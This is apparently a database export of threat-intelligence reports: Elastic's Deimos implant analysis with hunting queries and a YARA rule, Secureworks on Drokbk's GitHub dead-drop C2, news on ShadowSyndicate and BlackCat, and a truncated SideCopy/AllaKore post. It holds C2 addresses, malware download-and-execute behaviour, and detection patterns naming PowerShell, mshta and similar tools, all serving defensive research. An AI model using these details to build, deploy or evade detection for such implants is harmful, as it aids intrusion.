C2\nserver. The web request uses an HTTP POST method and sets a 10-minute\ntimeout on establishing communication.\n\nNo additional headers are set other than the default headers populated by the\n.Net WebRequest provider, which are: Host, Content-Length, and Connection:\nKeep-Alive.\n\nPOST / HTTP/1.1\n\nHost: 216.230.232.134\n\nContent-Length: 677\n\nConnection: Keep-Alive\n\nFigure 12: C2 HTTP headers\n\nFigure 13 depicts the hex dump of the body of the client's POST request.\n\nFigure 13: C2 HTTP body\n\nThe rst bytes in white are randomly generated and prepended to the body to\nobfuscate patterns in network communication. There will be between 0 and 512\n\n\fof these bytes. Next, shown in green, is a null byte, marking the end of random\ndata. The next 10 bytes, shown in blue, are a cookie value sent in the last\ncommunication from the server. This is likely to prevent replaying captured\npackets to the server, as each communication is unique. There is nothing specic\nrequiring this to be 10 bytes, but in all trac we observed, this was the case. In\nthe case of the initial check-in, this is not present. Finally, the remaining bytes\nshown in red here are the encrypted body. For the initial check-in, this is exactly\n256-bytes of RSA encrypted data that includes the key that will be used in\nfollow-on communications, and the unique hardware ID for this implant. For the\nremaining communications, the client uses AES-128 CBC mode for encryption.\nFor AES encryption, this portion will always be a multiple of 16-bytes in length.\n\nThe RSA public key used for the initial handshake is unique for each campaign.\nUsing the YARA rule in Figure 24, we were able to discover a total of 65 samples\nof the implant. The RSA key provided a pivot to discern unique campaigns,\nspanning countries from the United States to Moldova. Only 12.5% of the\nsamples included information stealing features, similar to what has been\nobserved with the Jupyter Infostealer. The rest of the samples were the Deimos\nimplant with no additional info stealing capabilities. This could mean that the\nimplant is gaining in popularity as it is full-featured and can be used for initial\naccess and persistence for any campaigns.\n\nMain Loop\n\nOnce the check-in process is completed, the main process loop begins. The\ndefault action of the implant during the main loop is the ping action. ping sends\ninformation about the environment, including the machine name, Windows\nversion, CPU architecture, information about if the user has administrative\nprivileges, and a version string for the implant.\n\n\fIf a task is scheduled for the implant, the response to the ping command will\ncontain a status value that is set to either \"le\" or \"command\". If no task is given,\nthe implant will sleep for 20 seconds + a random wait between 0 and 20\nseconds. This is the wait time between all tasks.\n\nFor \"le\" tasks, the implant immediately performs another request using the\ntask_id attribute from the task denition to retrieve the le. The implant expects\nan \"exe\" le, a \"ps1\" le, or a \"module\", which is a .Net Assembly le.\n\nWhen an \"exe\" is downloaded, it will be written to a le in the\n%TEMP%\\<RANDOM\\_NAME>.exe, where RANDOM_NAME is a 24-character\nalphanumeric value with all capital letters. A new process is immediately\nlaunched by executing the le and the status is reported on the next task interval.\n\nWhen a \"ps1\" le is downloaded, the contents of the script are passed to a new\nPowerShell process using Standard Input.\n\nFinally, \"module\" les are added to a \"plugin manager\" and executes the \"Run\"\nmethod.\n\nFor \"command\" tasks, no additional request is required. The \"command\" value\nfrom the response contains PowerShell code that will be executed the same as\nthe \"ps1\" le type.\n\n\fPresumably, the difference is for quick scripts or perhaps interactive operations,\nthe threat actor would use the \"command\" type. For larger scripts, the \"le\" type\nwould be used.\n\nTools\n\nLooking at the metadata from all of the observed samples, we can see a\nhigh-condence connection in that they were all created using a single PDF\nsoftware platform.\n\nComments : This installation was built with Inno Setup.\n\nCompany Name :\n\nFile Description : SlimReader Setup\n\nFile Version :\n\nLegal Copyright : (c) InvestTech\n\nOriginal File Name :\n\nProduct Name : SlimReader\n\nProduct Version : 1.4.1.2\n\nFigure 14: Malware lure le metadata\n\n\fWhile this software seems to be legitimate, it seems to be frequently used to\ncreate lure les. We have observed 53 malware, or malware-adjacent, samples\ncreated using the SlimReader tool. Additionally, the research team at eSentire\nidentied SlimReader as the tool of choice in the creation of, as reported, many\nhundreds of thousands of lure les.\n\nTTPs\n\nAt the very top of the pyramid, we observe a characteristic that is present in our\nsamples as well as others reported by security researchers. In all observed\ncases, the malware used techniques known as Google Sneaky Redirects and\nSearch Engine Optimization (SEO) Poisoning to trick users into installing the\nmalware.\n\nSEO poisoning is a technique used to put SEO keywords in a document to inate\nits ranking on search engines, so malicious documents and websites are higher\non web search results. Additionally, Google Sneaky Redirects is a technique used\nto name the initial malware installer after the Google search as a way to fool the\nuser into clicking on the le they downloaded. As an example, if a user searches\nfor \"free resume template\", and then clicks on a malicious website that appears\nto have that le, they will be presented with a malware installer named, in this\nexample, free-resume-template.exe. The malware will leverage a PDF icon even\nthough it is an executable as an attempt to trick the user into executing the PE\nle, which starts the PowerShell processes highlighted below in the Elastic\nAnalyzer view.\n\nFigure 15: Malware executing obfuscated PowerShell processes\n\n\fUnderstanding the malware processes as well as how it interacts with the\ndifferent elements with the Pyramid of Pain is paramount to inicting long-term\nimpacts to the activity group and intrusion sets.\n\nImpact\n\nThe described intrusion sets leverage multiple tactics and techniques\ncategorized by the MITRE ATT&CK framework. Other TTPs may exist, however,\nthey were not observed during our analysis.\n\nTactics\n\nResource Development\n\nInitial Access\n\nExecution\n\nPersistence\n\nDefense Evasion\n\nCommand and Control\n\nTechniques / Sub Techniques\n\nAcquire Infrastructure - Virtual Private Server\n\nDevelop Capabilities - Malware, Code Signing Certicates or Obtain Capabilities -\nMalware, Code Signing Certicates\n\n\fDrive-by Compromise\n\nCommand and Scripting Interpreter - PowerShell\n\nUser Execution - Malicious File\n\nBoot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\nDeobfuscate/Decode Files or Information\n\nObfuscated Files or Information - Indicator Removal from Tools\n\nApplication Layer Protocol - Web Protocols\n\nDetection\n\nThere is an existing detection rule that will generically identify this activity. We\nare also releasing two additional rules to detect these techniques. Additionally,\nwe are providing hunting queries that can identify other intrusion sets leveraging\nsimilar techniques.\n\nDetection Logic\n\nElastic maintains a public repository for detection logic using the Elastic Stack\nand Elastic Endgame.\n\nNew Detection Rules\n\nSuspicious Registry Modications\n\n\fAbnormal File Extension in User AppData Roaming Path\n\nHunting Queries\n\nThese queries can be used in Kibana's Security -\\> Timelines -\\> New Timeline \nCorrelation query editor. While these queries will identify this intrusion set, they\ncan also identify other events of note that, once investigated, could lead to other\nmalicious activities.\n\nThis query will identify the initial dropped le containing the obfuscated installer.\n\nle where le.path regex\n\"\"\"C:\\\\Users\\\\[^\\\\]*\\\\([a-z0-9]\\{32\\}\\\\)\\{6\\}[a-z0-9]\\{32\\}\"\"\"\n\nFigure 16: Hunt query identifying initial installer\n\nFigure 17: Hunt query identifying initial installer using Timelines\n\nThis query will identify the unique Hardware ID le (hwid) that is created the\nrst time the implant is run. This ID le is used to uniquely identify this\ninstallation.\n\nle where le.path regex~ \"\"\".*\\\\APPDATA\\\\ROAMING\\\\[A-Za-z0-9_]\\{96,192\\}\"\"\"\n\n\fFigure 18: Hunt query identifying Hardware ID\n\nFigure 19: Hunt query identifying Hardware ID using Timelines\n\nThis query will identify any les with a le extension of ten or more characters in\nthe AppData\\Roaming path.\n\nle where le.path : \"*\\\\appdata\\\\roaming\\\\*\" and\n\nlength(le.extension) \\>= 10 and\n\nprocess.name : (\"cmd.exe\", \"powershell.exe\", \"wmic.exe\", \"mshta.exe\", \"pwsh.exe\",\n\"cscript.exe\", \"wscript.exe\", \"regsvr32.exe\", \"RegAsm.exe\", \"rundll32.exe\",\n\"EQNEDT32.EXE\", \"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\",\n\"MSPUB.EXE\", \"MSACCESS.EXE\", \"iexplore.exe\", \"InstallUtil.exe\")\n\nFigure 20: Hunt query identifying long le extensions\n\nFigure 21: Hunt query identifying long le extensions in Timelines\n\nThis query will identify a long string value containing the word \"powershell\" in the\nRegistry.\n\n\fregistry where registry.data.strings : \"*powershell*\" and\nlength(registry.data.strings) \\>= 100\n\nFigure 22: Hunt query identifying long Registry strings\n\nFigure 23: Hunt query identifying long Registry strings in Timelines\n\nYARA Rules\n\nWe have created a YARA rule to identify the presence of the Deimos trojan DLL\nle described in this post.\n\nrule Windows_Trojan_Deimos_DLL {\n\nmeta:\n\nauthor = \"Elastic Security\"\n\ncreation_date = \"2021-09-18\"\n\nlast_modied = \"2021-09-18\"\n\nos = \"Windows\"\n\narch = \"x86\"\n\ncategory_type = \"Trojan\"\n\n\ffamily = \"Deimos\"\n\nthreat_name = \"Windows.Trojan.Deimos\"\n\ndescription = \"Detects the presence of the Deimos trojan DLL le.\"\n\nreference = \"\"\n\nreference_sample =\n\"2c1941847f660a99bbc6de16b00e563f70d900f9dbc40c6734871993961d3d3e\"\n\nstrings:\n\n$a1 = \"\\\\APPDATA\\\\ROAMING\" wide fullword\n\n$a2 = \"\\{\\\"action\\\":\\\"ping\\\",\\\"\" wide fullword\n\n$a3 = \"Deimos\" ascii fullword\n\n$b1 = \\{ 00 57 00 58 00 59 00 5A 00 5F 00 00 17 75 00 73 00 65 00 72 00 \\}\n\n$b2 = \\{ 0C 08 16 1F 68 9D 08 17 1F 77 9D 08 18 1F 69 9D 08 19 1F 64 9D \\}\n\ncondition:\n\nall of ($a*) or 1 of ($b*)\n\n\\}\n\nFigure 24: Deimos DLL YARA Rule\n\n\fYou can access this YARA rule here.\n\nDefensive Recommendations\n\nThe following steps can be leveraged to improve a network's protective posture.\n\nReview and implement the above detection logic within your environment using\ntechnology such as Sysmon and the Elastic Endpoint or Winlogbeat.\n\nReview and ensure that you have deployed the latest Microsoft Security Updates\n\nMaintain backups of your critical systems to aid in quick recovery.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-25T17:22:50.984Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6511fd761e5e587e4d3b5c98"
  },
  "name": "Drokbk",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Drokbk.pdf",
  "file_size": "48 KB",
  "content": "Secureworks Counter Threat Unit (CTU) researchers are investigating the Drokbk\n\nmalware, which is operated by a subgroup of the Iranian government-sponsored\n\nCOBALT MIRAGE threat group. This subgroup is known as Cluster B. Drokbk is written\n\nin .NET and is made up of a dropper and a payload. The malware has limited built-in\n\nfunctionality and primarily executes additional commands or code from the command\n\nand control (C2) server. Early signs of its use in the wild appeared in a February 2022\n\nintrusion at a U.S. local government network. A Drokbk malware sample was not\n\navailable from that incident for analysis, but CTU researchers later discovered\n\nsamples uploaded to the VirusTotal analysis service.\n\nDrokbk is deployed post-intrusion alongside other access mechanisms as an additional\n\nform of persistence within the victim's environment. COBALT MIRAGE's preferred form\n\nof remote access uses the Fast Reverse Proxy (FRPC) tool. While COBALT MIRAGE\n\nCluster A uses a modified version of this tool known as TunnelFish, Cluster B favors the\n\nunaltered version. The only public mention of Drokbk.exe is in a March third-party report\n\ndescribing activity that exhibits signs of a Cluster B intrusion. In that instance, the\n\nmalware used the C2 domain activate-microsoft . cf, which is known to be associated\n\nwith Cluster B.\n\nThe February intrusion that Secureworks incident responders investigated began with a\n\ncompromise of a VMware Horizon server using two Log4j vulnerabilities\n\n(CVE-2021-44228 and CVE-2021-45046). Forensic artifacts indicated Drokbk.exe was\n\nextracted from a compressed archive (Drokbk.zip) hosted on the legitimate transfer . sh\n\nonline service. The threat actors extracted the file to C:\\Users\\DomainAdmin\\Desktop\\\n\nand then executed it.\n\nThe Drokbk dropper checks for the existence of the c:\\programdata\\SoftwareDistribution\n\ndirectory and creates the directory if it does not exist. The dropper then writes all bytes\n\nfrom an internal resource to c:\\users\\public\\pla. This is a temporary step; the extracted\n\nfile (pla) is then copied to c:\\programdata\\SoftwareDistribution\\SessionService.exe.\n\nUsing this newly created file, the dropper adds the SessionManagerService service for\n\npersistence. Finally, the dropper deletes c:\\users\\public\\pla. Figure 1 illustrates the\n\n\finstallation process. CTU researchers have observed that the Cluster B operators favor\n\nc:\\users\\public\\ as a directory used across multiple malware tools.\n\nSessionService.exe is the main malware payload, and it begins by finding its C2\n\ndomain. A C2 domain is often preconfigured in malware. However, Drokbk uses the\n\ndead drop resolver technique to determine its C2 server by connecting to a legitimate\n\nservice on the internet (e.g., GitHub). The C2 server information is stored on a cloud\n\nservice in an account that is either preconfigured in the malware or that can be\n\ndeterministically located by the malware.\n\nFigure 2 shows decompiled .NET code from SessionService.exe. The binary uses the\n\nGitHub API to search for the 'mainrepositorytogeta' repository.\n\nThis code identifies the specific GitHub account and the request used to locate the\n\nmalware's C2 server. The response is stored within the README.md file hosted on the\n\nGitHub account (see Figure 3). In this campaign, the threat actor used a GitHub account\n\nwith the username Shinault23.\n\nThis approach gives the threat actors a degree of resiliency against shuttering of their\n\nGitHub account, as they can create a new account with a matching repository name. It\n\nalso allows the malware to dynamically update its C2 server by repeating this process.\n\nThe first commit to the README.md file occurred on June 9, 2022, suggesting this\n\ncampaign began around this date. Between June 9 and July 13, the threat actors\n\nchanged the C2 server multiple times. GitHub maintains a commit history for the file,\n\nlisting each change (see Figure 4).\n\nFigure 5 lists the C2 servers configured between June 9 and July 13. These domain\n\nnames and URL structures align with infrastructure patterns observed in other Cluster B\n\nactivity, providing additional evidence supporting technical attribution.\n\nUsing the information from README.md, SessionService.exe sends an initial request to\n\nthe C2 server. The request contains the hostname and current time (see Figure 6).\n\n\fDuring execution, CTU researchers observed Drokbk creating the following files. No\n\npayloads or commands were received from the C2 during analysis.\n\n C:\\Windows\\Temp\\v2ggla\n\n C:\\Windows\\Temp\\vdoma434\n\n C:\\programdata\\Interop Services\n\nTo mitigate exposure to this malware, CTU researchers recommend that organizations\n\nuse available controls to review and restrict access using the indicators listed in Table 1.\n\nNote that IP addresses can be reallocated. The domains, IP addresses, and URL may\n\ncontain malicious content, so consider the risks before opening them in a browser.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-25T21:36:54.475Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6512edf4c12f2c67e0da8899"
  },
  "name": "ShadowSyndicate Infrastructure",
  "file_type": null,
  "website_url": "https://www.bleepingcomputer.com/news/security/shadowsyndicate-hackers-linked-to-multiple-ransomware-ops-85-servers/",
  "website_title": "ShadowSyndicate hackers linked to multiple ransomware ops, 85 servers",
  "file_name": null,
  "file_size": null,
  "content": "NEWS\nDOWNLOADS\nVPNS\nVIRUS REMOVAL GUIDES\nTUTORIALS\nDEALS\nFORUMS\nMORE\nHomeNewsSecurityShadowSyndicate hackers linked to multiple ransomware ops, 85 servers\n  ShadowSyndicate hackers linked to multiple ransomware ops, 85 servers\nBy Bill Toulas\nSeptember 26, 2023 05:11 AM 0\nSecurity researchers have identified infrastructure belonging to a threat actor now tracked as ShadowSyndicate, who likely deployed seven different ransomware families in attacks over the past year.\nGroup-IB analysts working together with Bridewell and independent researcher Michael Koczwara attribute with various degrees of confidence ShadowSyndicate's use of the Quantum, Nokoyawa, BlackCat/ALPHV, Clop, Royal, Cactus, and Play ransomware in multiple breaches observed since July 2022.\nBased on their findings, researchers believe that the threat actor could be an initial access broker (IAB), although evidence suggests that ShadowSyndicate is an affiliate to multiple ransomware operations.\nTop Stories\nREAD MORE\nSickKids impacted by BORN Ontario data breach that hit\n3.4 million\nThe researchers base their conclusions on a distinct SSH fingerprint they discovered on 85 IP servers, most of them tagged as Cobalt Strike command and control machines.\n\"We have dubbed the threat actor that uses the SSH fingerprint 1ca4cbac895fc3bd12417b77fc6ed31d ShadowSyndicate (previous name Infra Storm)\" - Group-IB\nThe analysts first saw the fingerprint on July 16, 2022, and it was still in use in August 2023.\nHosts associated with the same SSH fingerprint (Group-IB)\nShadowSyndicate arsenal\nThe team of researchers relied on various tools for their investigation, which included discovery engines like Shodan and Censys, along with various OSINT techniques. This allowed them to discover an extensive ShadowSyndicate activity footprint.\nLooking at the ShadowSyndicate servers identified based on the SSH fingerprint, the researchers \"came across eight different Cobalt Strike watermarks [license keys].\"\nThe eight Cobalt Strike servers communicated with Cactus, Royal, Quantum, Nokoyawa, Play, Clop, and BlackCat/ALPHV ransomware deployed on various victim networks.\nThe researchers also discovered Cobalt Strike configurations deployed on two servers, but only one of them on a machine featuring the ShadowSyndicate SSH fingerprint.\nIn some attacks, ShadowSyndicate used the Sliver penetration tool that was previously regarded as a potential replacement for Cobalt Strike.\nOther tools seen in ShadowSyndicate attacks include the IcedID malware loader, the Matanbuchus MaaS loader, and the Meterpreter Metasploit payload.\nServer analysis\nThe analysts tested the hypothesis that all 85 servers with the same SSH key fingerprint linked to ShadowSyndicate are connected to a single hosting provider but found 18 different owners, 22 distinct network names, and 13 different locations.\nLocation of servers (Group-IB)\nAnalysis of Cobalt Strike C2 parameters like detection date, watermarks, or sleep time settings helped produce high-confidence evidence that links ShadowSyndicate to Quantum, Nokoyawa, and ALPHV/BlackCat ransomware.\nSpecifically, the analysts linked the servers to a Quantum attack from September 2022, three Nokoyawa attacks from Q4 2022 and April 2023, and an ALPHV attack from February 2023.\nGroup-IB and the mentioned collaborating parties has found additional evidence that connects ShadowSyndicate with less confidence to Ryuk, Conti, Trickbot, Royal, Clop, and Play malware operations.\nFor Clop particularly, Group-IB's report mentions that at least 12 IP addresses formerly linked to the notorious ransomware operators were transferred to ShadowSyndicate since August 2022 and are now utilized for Cobalt Strike.\nIP address overlaps between Clop and ShadowSyndicate (Group-IB)\nDespite the many findings that suggest a potential connection, a high-confidence direct link between ShadowSyndicate and Clop remains elusive.\nGroup-IB's intelligence experts conclude that ShadowSyndicate is likely an affiliate working with various ransomware-as-a-service (RaaS) operations. However, additional evidence is needed to support this theory.\nNevertheless, this work is crucial in identifying and combating cybercrime, and in this spirit, the cyberintelligence firm invites external researchers to openly collaborate with them and help uncover the remaining obscure parts.\nFor details that could help defenders detect and attribute ShadowSyndicate activity, Group-IB has published a report today with technical data from their research.\nRelated Articles:\nThe Week in Ransomware - July 28th 2023 - New extortion tactics\nBlackCat ransomware hits Azure Storage with Sphynx encryptor\nMicrosoft: BlackCat's Sphynx ransomware embeds Impacket, RemCom\nMGM casino's ESXi servers allegedly encrypted in ransomware attack\nThe Week in Ransomware - August 18th 2023 - LockBit on Thin Ice\nAFFILIATES ALPHV BLACKCAT CLOP NOKOYAWA QUANTUM RANSOMWARE SHADOWSYNDICATE SSH\nBILL TOULAS\nBill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.\nPREVIOUS ARTICLE\nNEXT ARTICLE\nPost a Comment\nCommunity Rules\nYou need to login in order to post a comment\nNot a member yet? Register Now\nYou may also like:\nPOPULAR STORIES\nFake celebrity photo leak videos flood TikTok with Temu referral codes\nXenomorph Android malware now targets U.S. banks and crypto wallets\nFOLLOW US:\nMAIN SECTIONS\nNews\nVPN Buyer Guides\nDownloads\nVirus Removal Guides\nTutorials\nStartup Database\nUninstall Database\nGlossary\nCOMMUNITY\nForums\nForum Rules\nChat\nUSEFUL RESOURCES\nWelcome Guide\nSitemap\nCOMPANY\nAbout BleepingComputer\nContact Us\nSend us a Tip!\nAdvertising\nWrite for BleepingComputer\nSocial & Feeds\nChangelog\nTerms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure\nCopyright @ 2003 - 2023 Bleeping Computer® LLC - All Rights Reserved",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-26T14:43:00.308Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6512efdfc12f2c67e0da889c"
  },
  "name": "BlackCat Azure Storage Attacks",
  "file_type": null,
  "website_url": "https://www.bleepingcomputer.com/news/security/blackcat-ransomware-hits-azure-storage-with-sphynx-encryptor/",
  "website_title": "BlackCat ransomware hits Azure Storage with Sphynx encryptor",
  "file_name": null,
  "file_size": null,
  "content": "NEWS\nDOWNLOADS\nVPNS\nVIRUS REMOVAL GUIDES\nTUTORIALS\nDEALS\nFORUMS\nMORE\nHomeNewsSecurityBlackCat ransomware hits Azure Storage with Sphynx encryptor\n  BlackCat ransomware hits Azure Storage with Sphynx encryptor\nBy Sergiu Gatlan\nSeptember 16, 2023 10:11 AM 0\nImage: Midjourney\nThe BlackCat (ALPHV) ransomware gang now uses stolen Microsoft accounts and the recently spotted Sphynx encryptor to encrypt targets' Azure cloud storage.\nWhile investigating a recent breach, Sophos X-Ops incident responders discovered that the attackers used a new Sphynx variant with added support for using custom credentials. \nTop Stories\nREAD MORE\nSickKids impacted by BORN Ontario data breach that hit\n3.4 million\nAfter gaining access to the Sophos Central account using a stolen One-Time Password (OTP), they disabled Tamper Protection and modified the security policies. These actions were possible after stealing the OTP from the victim's LastPass vault using the LastPass Chrome extension.\nSubsequently, they encrypted the Sophos customer's systems and remote Azure cloud storage and appended the .zk09cvt extension to all locked files. In total, the ransomware operators could encrypt 39 Azure Storage accounts successfully.\nThey infiltrated the victim's Azure portal using a stolen Azure key that provided them access to the targeted storage accounts. The keys used in the attack were injected within the ransomware binary after being encoded using Base64.\nThe attackers also used multiple Remote Monitoring and Management (RMM) tools like AnyDesk, Splashtop, and Atera throughout the intrusion. \nSophos discovered the Sphynx variant in March 2023 during an investigation into a data breach that shared similarities with another attack described in an IBM-Xforce report published in May (the ExMatter tool was used to extract the stolen data in both instances).\nMicrosoft also found last month that the new Sphynx encryptor is embedding the Remcom hacking tool and the Impacket networking framework for lateral movement across compromised networks.\nBlackCat ransom note sample\nAs a ransomware operation that emerged in November 2021, BlackCat/ALPHV is suspected to be a DarkSide/BlackMatter rebrand.\nKnown initially as DarkSide, this group garnered global attention after breaching Colonial Pipeline, drawing immediate scrutiny from international law enforcement agencies.\nAlthough they rebranded as BlackMatter in July 2021, operations were abruptly halted in November when authorities seized their servers and security firm Emsisoft developed a decryption tool exploiting a vulnerability in the ransomware.\nThis gang has consistently been recognized as one of the most sophisticated and high-profile ransomware outfits that targets enterprises on a global scale, continuously adapting and refining its tactics.\nFor instance, in a new extortion approach last summer, the ransomware gang used a dedicated clear web website to leak the stolen data of a specific victim, providing the victim's customers and employees with the means to determine whether their data had been exposed.\nMore recently, BlackCat introduced a data leak API in July designed to streamline the dissemination of stolen data.\nThis week, one of the gang's affiliates gang (tracked as Scattered Spider) claimed the attack on MGM Resorts, saying they encrypted over 100 ESXi hypervisors after the company took down its internal infrastructure and refused to negotiate a ransom payment. \nLast April, the FBI issued a warning highlighting that the group was behind the successful breaches of more than 60 entities worldwide between November 2021 and March 2022.\nRelated Articles:\nMicrosoft: BlackCat's Sphynx ransomware embeds Impacket, RemCom\nShadowSyndicate hackers linked to multiple ransomware ops, 85 servers\nMGM casino's ESXi servers allegedly encrypted in ransomware attack\nJapanese watchmaker Seiko breached by BlackCat ransomware gang\nThe Week in Ransomware - July 28th 2023 - New extortion tactics\nALPHV AZURE AZURE STORAGE BLACKCAT RANSOMWARE SPHYNX\nSERGIU GATLAN\nSergiu has covered cybersecurity, technology, and other news beats for more than a decade. Email or Twitter DMs for tips.\nPREVIOUS ARTICLE\nNEXT ARTICLE\nPost a Comment\nCommunity Rules\nYou need to login in order to post a comment\nNot a member yet? Register Now\nYou may also like:\nPOPULAR STORIES\nFake celebrity photo leak videos flood TikTok with Temu referral codes\nXenomorph Android malware now targets U.S. banks and crypto wallets\nFOLLOW US:\nMAIN SECTIONS\nNews\nVPN Buyer Guides\nDownloads\nVirus Removal Guides\nTutorials\nStartup Database\nUninstall Database\nGlossary\nCOMMUNITY\nForums\nForum Rules\nChat\nUSEFUL RESOURCES\nWelcome Guide\nSitemap\nCOMPANY\nAbout BleepingComputer\nContact Us\nSend us a Tip!\nAdvertising\nWrite for BleepingComputer\nSocial & Feeds\nChangelog\nTerms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure\nCopyright @ 2003 - 2023 Bleeping Computer® LLC - All Rights Reserved",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-26T14:51:11.387Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6512f386c12f2c67e0da889f"
  },
  "name": "AllaKore",
  "file_type": null,
  "website_url": "https://www.team-cymru.com/post/allakore-d-the-sidecopy-train",
  "website_title": "AllaKore(d) the SideCopy Train",
  "file_name": null,
  "file_size": null,
  "content": "Home\nProducts\nThreat Vectors\nCommunity Services\nResources\nCompany\nCONTACT SALES\nAll Posts\nThreat Research\nS2 Research Team\nApr 19\n5 min read\nAllaKore(d) the SideCopy Train\nUpdated: Jul 20\nIdentifying Connected Infrastructure and Management Activities\n\nIntroduction\n\nThis blog post seeks to build on recent public reporting on campaigns attributed to SideCopy, a Pakistani-linked threat group. SideCopy has been active since 2019, primarily targeting South Asian countries, with a focus on India and Afghanistan. The group's name comes from its use of an infection chain that mimics that of SideWinder APT, an Indian-linked threat group.\n\nThe distinction between SideWinder and SideCopy was first made by security researcher @Sebdraven and is documented here.\n\n\nSome reports suggest that SideCopy may be a subdivision of Transparent Tribe (APT36), with similar tactics and techniques observed.\n\nThe S2 Research Team has blogged previously on the activities of Transparent Tribe:\n\nTransparent Tribe APT Infrastructure Mapping - Part One \nTransparent Tribe APT Infrastructure Mapping - Part Two \n\nIn this post we share the discoveries of our S2 Threat Research Team after examining analysis by the Chinese cyber security company QiAnXin, published on 20 March 2023, which detailed a SideCopy attack chain used to deploy AllaKore RAT. AllaKore RAT is an open-source remote access tool which has been modified for the purposes of SideCopy operations, and is commonly observed in their intrusions.\n\nKey Findings\n\nIdentification of additional malware samples and C2 infrastructure associated with SideCopy targeting of the Indian Ministry of Defense\nEvidence of management activity sourced from mobile IPs located in Pakistan, centered around a key IP address (66.219.22.252) connected to SideCopy’s use of Action RAT\nFurther credence provided to the assessment that SideCopy is a Pakistani-linked threat actor group, involved state-level espionage activities\n\nIndia in the Crosshairs\n\nAs discussed in the analysis by QiAnXin, spear phishing was used as the initial delivery method for this campaign. Examining the lures involved, the targets appear to be users in India, specifically in the Ministry of Defence.\n\nFigure 1: Example PDF Lure (https://twitter.com/jaydinbas/status/1629149627848044550)\n\nIn a bid to further understanding of this campaign, we will not seek to repeat analysis of the infection chain. Instead we will focus on the two tools which were ultimately dropped, examining threat telemetry surrounding their associated command and control (C2) infrastructure.\n\nDUser.dll (Action RAT)\n\nThe first tool, identified as Action RAT in analysis by Cyble, is dropped onto the victim machine alongside a benign executable which is used to sideload it, in order to avoid detection. Action RAT’s capabilities include the ability to receive commands from the C2 server, to retrieve information from the victim machine, to execute further payloads, and to upload information back to the C2.\n\nWe found two samples of Action RAT (loaded as DUser.dll), including the sample analyzed by Cyble.\n\nCyble Sample\nStage 1: feeadc91373732d65883c8351a6454a77a063ff5 (DRDO - K4 Missile Clean room.pptx.lnk)\nC2: www.cornerstonebeverly[.]org\n\nAction RAT: 3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5 (DUser.dll)\nC2: 144.91.72.17:8080 (Contabo GmbH)\n\nSample Two\nStage 1: 0d68a135b1f4be18481cf44ed02bcbf82aeb542e (Cyber Advisory - Profiles (Pic and Mob No) of PIOs.docx.lnk)\nC2: www.kwalityproducts[.]com\n\nAction RAT: cb031561fd76643885671922db7d5b840060334d (DUser.dll)\nC2: 84.46.250.78:8080 (Contabo GmbH)\n\nExamining threat telemetry for the two C2 IPs 144.91.72.17 and 84.46.250.78 we observed initial victim connections on 06 February 2023 and 15 March 2023 respectively. \n\nIn total we observed 18 distinct victims, all located in India, connecting to the C2 servers - highlighting the targeted nature of the campaign.\n\nFurther to this activity we also observed 37 distinct IPs (again all located in India) connecting to 144.91.72.17:9468 in activity which commenced on 07 January 2023. Of the 37 IPs, two were observed connecting to the Action RAT port (TCP/8080).\n\nWe were unable to identify a sample talking to TCP/9468 of 144.91.72.17, however we would hypothesize that this IP was used for C2 communications with another tool associated with SideCopy activities.\n\nManagement Hints?\n\nExamining outbound activity from 144.91.72.17 and 84.46.250.78, we observed connections from 84.46.250.78 to 66.219.22.252:82 (IMMEDION, US). Whilst 66.219.22.252 is assigned to an American provider, WHOIS data places it in Pakistan.\n\nFurther examining connections to 66.219.22.252:82, we observed communications sourced from 17 distinct IPs assigned to Pakistani mobile providers and four Proton VPN nodes during the period of interest.\n\nAll of the Proton VPN nodes and all but three of the Pakistani mobile IPs were also observed connecting to 66.219.22.252:3389 within the same time period. Port 3389 (RDP) is often observed open on SideCopy (and Transparent Tribe) C2 servers, and is believed to be utilized for management purposes by the threat actors.\n\nThese findings are therefore indicative of management of 66.219.22.252 by actors likely located in Pakistan, in addition to actors unknown accessing via Proton VPN infrastructure.\n\nExamining the communications sourced from the Pakistani mobile IPs, to 66.219.22.252:82 and 66.219.22.252:3389, we can start to build a general pattern of life, illustrated in Figure 2 below. \n\nFigure 2: Pattern of Life for Management of 66.219.22.252\n\nThe timings in Figure 2 shown above are based on UTC, which is 5 hours behind Pakistan Standard Time. Therefore, Figure 2 demonstrates that management of 66.219.22.252 occurs between Monday to Saturday, from roughly 10AM to 7PM - with some exceptions on Thursdays.\n\nThese data points are potentially indicative of the threat actors accessing their infrastructure within a typical working week cadence, suggesting that management is undertaken professionally.\n\nFinally, when analyzing threat telemetry data for 66.219.22.252, we also observed inbound connections to TCP/8080 and TCP/9467 sourced from IP addresses assigned to Indian providers. TCP/9467 is noteworthy given its similarity to the activity observed on 144.91.72.17:9468 which we assess to be indicative of SideCopy C2 communications.\n\nThe findings in this section derived from threat telemetry data are summarized below in Figure 2.\n\nFigure 3: Threat Telemetry Data Associated with the Action RAT C2s\n\nAllaKore RAT\n\nAccording to QiAnXin’s analysis, DUser.dll is also used to load and execute a version of AllaKore RAT, which is dropped on the victim machine 